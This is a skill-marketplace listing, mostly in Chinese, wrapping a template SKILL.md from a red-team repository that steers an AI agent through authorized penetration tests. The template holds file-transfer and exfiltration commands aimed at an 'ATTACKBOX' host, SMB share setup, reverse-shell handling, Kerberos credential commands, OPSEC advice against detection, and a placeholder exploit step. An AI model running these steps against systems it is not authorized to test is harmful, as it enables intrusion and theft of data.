Agent测试
- 作者仓库星标 196
- 作者更新于 实时读取
- 作者仓库 red-run
- 领域
- 通用
- 兼容 Agent
-
- Claude Code
- Cursor
- Cline
- Codex
- Windsurf
- Gemini CLI
- +20
- 信任分
- 88 / 100 · 社区维护
- 作者 / 版本 / 许可
- @blacklanternsecurity · 未声明 license
- Token 消耗评级
- 低消耗
- 接入复杂程度
- 需手动接入
- 是否需要外部 API Key
- 不需要
- 兼容的系统
- Linux · Docker
- 底层运行要求
- Docker
- 文件与系统权限
-
- 只读
- 允许写入 / 修改
- Shell 执行
- 网络行为
- 允许外网请求
- 安装命令数
- 26 条
档案由构建时根据 SKILL.md 与安装命令自动衍生,可能与作者实际意图存在差异。
需要注意: 未限定 allowed-tools,默认拥有全部工具权限。
---
name: <skill-name>
description: > You are helping a penetration tester with <technique description>. All testing is under explic…
category: 通用
runtime: Docker
---
# <skill-name> 输出预览
## PART A: 任务判断
- 适用问题:通用任务拆解、检查和交付。
- 输入要求:目标材料、限制条件、期望输出和验收方式。
- 证据边界:围绕“Engagement Logging / Scope Boundary / State Management”读取原文规则,不把推断写成作者承诺。
## PART B: 执行结果
- **01** 任务判断:确认你的需求是否属于通用任务拆解、检查和交付,并标出输入、限制和预期结果。
- **02** 执行计划:优先按“Engagement Logging / Scope Boundary / State Management”拆成步骤,说明每一步会读取什么、修改什么、产出什么。
- **03** 交付结果:给出可复制的命令、文件改动、检查清单或内容草稿,并说明如何继续迭代。
- **04** 风险边界:结合 读取文件、写入/修改文件、执行终端命令、会按任务需要访问外部网络、通常不需要额外 API Key 给出执行前确认项。
## Running Rules
- 读取文件、写入/修改文件、执行终端命令;会按任务需要访问外部网络;通常不需要额外 API Key。
- 先小样例验证,再放大到真实任务。
- 交付时同时给结果、检查口径和下一步迭代建议。 原文出现了 `/opt`、`/usr`、`/tmp` 这类斜杠命令;如果你的 Agent 支持命令触发,优先用命令开场,再补充目标和边界。
告诉 Agent 目标文件或材料、期望结果、不可改范围、是否允许联网或执行命令。本 Skill 的权限画像是:读取文件、写入/修改文件、执行终端命令。
先用一个小任务确认它会围绕“Engagement Logging / Scope Boundary / State Management”工作;涉及文件或命令时,先看 diff、日志、预览或测试结果。
检查最终产物是否包含明确结果、必要证据和下一步动作;如果输出泛泛而谈,就补充输入、边界和验收标准后重跑。
---
name: <skill-name>
description: > You are helping a penetration tester with <technique description>. All testing is under explic…
category: 通用
source: blacklanternsecurity/red-run
---
# <skill-name>
## 什么时候使用
- 用于组织测试、定位失败并形成修复闭环 适合处理通用任务拆解、检查、交付和复盘,核心价值是把输入、判断、执行、验证和交付边界固定下来,避免 Agent 泛泛回答。 把任务拆成可执行、可检查、可继续迭代的步骤;通常不需要额外 API Key…
- 面向通用任务拆解、检查和交付,优先处理能明确输入、步骤和验收标准的工作。
## 需要提供什么
- 目标材料、目录范围、期望结果和不可改动内容。
- 是否允许联网、执行命令、读写文件或调用外部服务。
## 执行规则
- 围绕「Engagement Logging / Scope Boundary / State Management」组织步骤,不把推断写成作者事实。
- 读取文件、写入/修改文件、执行终端命令;会按任务需要访问外部网络;通常不需要额外 API Key。
- 先跑小样例,确认结果可检查后再扩大任务范围。
## 输出要求
- 给出最终产物、关键证据、验证方式和下一步动作。
- 信息不足时标记 unknown,不编造命令、平台或依赖。 作者原文负责流程事实;仓库文件负责来源和命令;流狐只补充适用场景、限制和质量判断。
skill "<skill-name>" {
输入层 -> 用户目标 + 目标文件 + 禁止范围 + 验收标准
上下文层 -> Engagement Logging / Scope Boundary / State Management
规则层 -> SKILL.md 触发条件 / 执行顺序 / 输出格式
运行层 -> Docker | 读取文件、写入/修改文件、执行终端命令 | 会按任务需要访问外部网络
安全层 -> 通常不需要额外 API Key + 小任务验证 + diff / 日志复核
输出层 -> 可复制结果 + 检查清单 + 下一步迭代
} You are helping a penetration tester with
Engagement Logging
Check for ./engagement/ directory. If absent, proceed without logging.
When an engagement directory exists:
- Print
[<skill-name>] Activated → <target>to the screen on activation. - Evidence → save significant output to
engagement/evidence/with descriptive filenames (e.g.,sqli-users-dump.txt,ssrf-aws-creds.json).
Scope Boundary
This skill covers
Do not load or execute another skill. Do not continue past your scope boundary. Instead, return to the orchestrator with:
- What was found (vulns, credentials, access gained)
- Context to pass (injection point, target, working payloads, etc.)
The orchestrator decides what runs next. Your job is to execute this skill thoroughly and return clean findings.
Stay in methodology. Only use techniques documented in this skill. If you encounter a scenario not covered here, note it and return — do not improvise attacks, write custom exploit code, or apply techniques from other domains. The orchestrator will provide specific guidance or route to a different skill.
Bail out on unmet preconditions. If the Prerequisites for this skill are not met (e.g., the injection point doesn't exist, the service isn't running, user input never reaches the target function), report a negative finding and return immediately. Do not pivot to unrelated attack vectors — the orchestrator will route to the correct skill based on your report.
State Management
Call get_state_summary() from the state MCP server to read current
engagement state. Use it to:
- Skip re-testing targets, parameters, or vulns already confirmed
- Leverage existing credentials or access for this technique
- Understand what's been tried and failed (check Blocked section)
Your return summary must include:
- New targets/hosts discovered (with ports and services)
- New credentials or tokens found
- Access gained or changed (user, privilege level, method)
- Vulnerabilities confirmed (with status and severity)
- Pivot paths identified (what leads where)
- Blocked items (what failed and why, whether retryable)
Tool Requirements (Local-Only)
NEVER download, clone, install, or build tools. The operator's attackbox has a curated toolset — do not modify it. This is an OPSEC requirement: downloading tools mid-engagement triggers traffic inspection alerts and burns the operation.
Prohibited actions:
git clone— any repository, any sourcepip install/pipx install/pip3 install— any packagenpm install/go install/cargo install— any packagewget/curl -o/curl -O— downloading files from the internetapt install/apt-get install— system packages- Building tools from source that aren't already on the attackbox
If a tool required by this skill is not installed:
- STOP immediately — do not attempt workarounds or alternative tools
- Return to the orchestrator with:
- Which tool is missing
- What it's needed for
- The command that would install it (so the operator can review and run it)
- The orchestrator presents this to the operator as a hard stop
Check if a tool exists before reporting it missing:
which <tool> 2>/dev/null || find /opt /usr/share /usr/local ~/.local/bin \
-name '<tool>' -type f 2>/dev/null | head -3
Tools provided via MCP (nmap, shell-server commands) and tools inside the red-run Docker containers (evil-winrm, impacket, Responder, etc.) are always available — do not check for these.
Exploit and Tool Transfer
Never download exploits, scripts, or tools directly to the target from the
internet (curl https://github.com/..., git clone on target). Targets may
lack outbound internet access, and operators must review files before they
reach the target.
Attackbox-first workflow:
- Check locally first — see Tool Discovery above
- Download on attackbox (only if not found) —
git clone,curl,searchsploit -mlocally - Review — inspect source code or binary provenance before transferring
- Serve —
python3 -m http.server 8080from the directory containing the file - Pull from target —
wget http://ATTACKBOX:8080/file -O /tmp/fileorcurl http://ATTACKBOX:8080/file -o /tmp/file
Alternatives when HTTP is not viable: scp/sftp (if SSH exists),
nc file transfer, base64-encode and paste, or
impacket-smbserver share . -smb2support on attackbox.
Inline source code written via heredoc in this skill does not need this workflow — the operator can read the code directly.
Web Interaction
When interacting with web applications, use the browser MCP tools as the default for navigating sites, filling forms, and managing sessions. Browser tools handle CSRF tokens, session cookies, JavaScript-rendered content, and multi-step flows that curl cannot.
- Browser tools (default) — navigate pages, fill forms, manage sessions, take screenshots for evidence, execute JavaScript for DOM inspection
- curl (fallback) — crafted payloads needing precise header/body control, injection testing where exact request structure matters
- Injection-focused skills may use curl directly for payload delivery when the browser adds unwanted encoding or headers
File Exfiltration
When retrieving files from a compromised target (loot, backups, configs, databases), prefer direct download over encoding. Choose the first method that works:
- Web-accessible (file in webroot, served by HTTP/HTTPS)?
→
curl/wgetfrom attackbox. Fastest and cleanest. - SSH/SCP access available?
→
scp user@target:/path/file ./engagement/evidence/ - Target can reach attackbox (outbound HTTP)?
→ Target:
python3 -m http.server 8080from the file's directory → Attackbox:curl http://TARGET:8080/file -o evidence/file - SMB available?
→ Attackbox:
impacket-smbserver share ./evidence -smb2support→ Target:copy file \\ATTACKBOX\share\file - Last resort (air-gapped, no outbound, no writable shares):
→
base64 file | tr -d '\n'on target, paste on attackbox, decode → Only for small files (<50KB)
Never default to base64 when a download method exists. Base64 is slow, error-prone on large files, and produces unreadable blobs in shell transcripts.
Shell Access
Use the shell-server MCP tools documented in your agent template to catch and stabilize reverse shells. Prefer reverse shells over inline command execution.
Prerequisites
- <Required tools (with install note)>
Special characters in credentials
Bash history expansion treats ! as a special character (!event), even
inside double quotes. Passwords containing !, $, backticks, or other
shell metacharacters will be silently mangled when passed as command arguments.
Canonical workaround — write to file, read from file:
# 1. Use the Write tool (not echo/printf) to create a password file
# The Write tool bypasses shell interpretation entirely
Write("/tmp/claude-1000/cred.txt", "lDaP_1n_th3_cle4r!")
# 2. Read into a variable
PASS=$(cat /tmp/claude-1000/cred.txt)
# 3. Use the variable in commands (double-quote it)
certipy req -username user@domain -password "$PASS" -dc-ip 10.10.10.5
Do NOT attempt to escape ! with \!, single quotes, set +H, or printf.
These are unreliable in the Claude Code Bash tool context. The Write-to-file
pattern is the only reliable approach.
Impacket binary naming
Impacket tools have inconsistent binary names across installations. Some
systems use getTGT.py, addcomputer.py, secretsdump.py; others use
impacket-getTGT, impacket-addcomputer, impacket-secretsdump (pip/pipx
installed). Before using an Impacket tool, find the correct binary:
# Example: find addcomputer
which addcomputer.py 2>/dev/null || which impacket-addcomputer 2>/dev/null
Use whichever binary exists. If neither is found, check /usr/share/doc/python3-impacket/examples/ (Debian) or ~/.local/bin/ (pipx).
Tool output directory
Several tools write output files to CWD with no output-path flag
(getTGT.py → <user>.ccache, certipy req → <user>.pfx,
certipy auth → <user>.ccache, bloodyAD add shadowCredentials →
<user>_*.pfx). To avoid scattering files in the working directory:
# Always prefix CWD-writing commands with cd $TMPDIR
cd $TMPDIR && getTGT.py DOMAIN/user -hashes :NTHASH
export KRB5CCNAME=$TMPDIR/user.ccache
cd $TMPDIR && certipy req -k -no-pass -dc-ip DC_IP -ca 'CA' -template Tpl
cd $TMPDIR && certipy auth -pfx $TMPDIR/user.pfx -dc-ip DC_IP
# Save evidence with mv (not cp) to avoid stray duplicates
mv $TMPDIR/user.pfx engagement/evidence/user.pfx
mv $TMPDIR/user.ccache engagement/evidence/user.ccache
Note: getTGT.py does NOT support -out. It always writes
<user>.ccache to CWD. The cd $TMPDIR && prefix is the only control.
Step 1: Assess
If not already provided by the orchestrator or conversation context, determine:
Skip if context was already provided.
Step 2: Confirm Vulnerability
Step 3: Exploit
Variant A:
# Explanation of what this does
command arg1 arg2
Variant B:
# Alternative when Variant A fails or is blocked
command arg1 arg2
Step N: Post-Exploitation Exit
STOP and return to the orchestrator with:
- What was achieved (RCE, creds, file read, etc.)
- New credentials, access, or pivot paths discovered
- Context for next steps (platform, access method, working payloads)
先判断是否适合
作者设计意图
作者的方法与取舍
边界和复核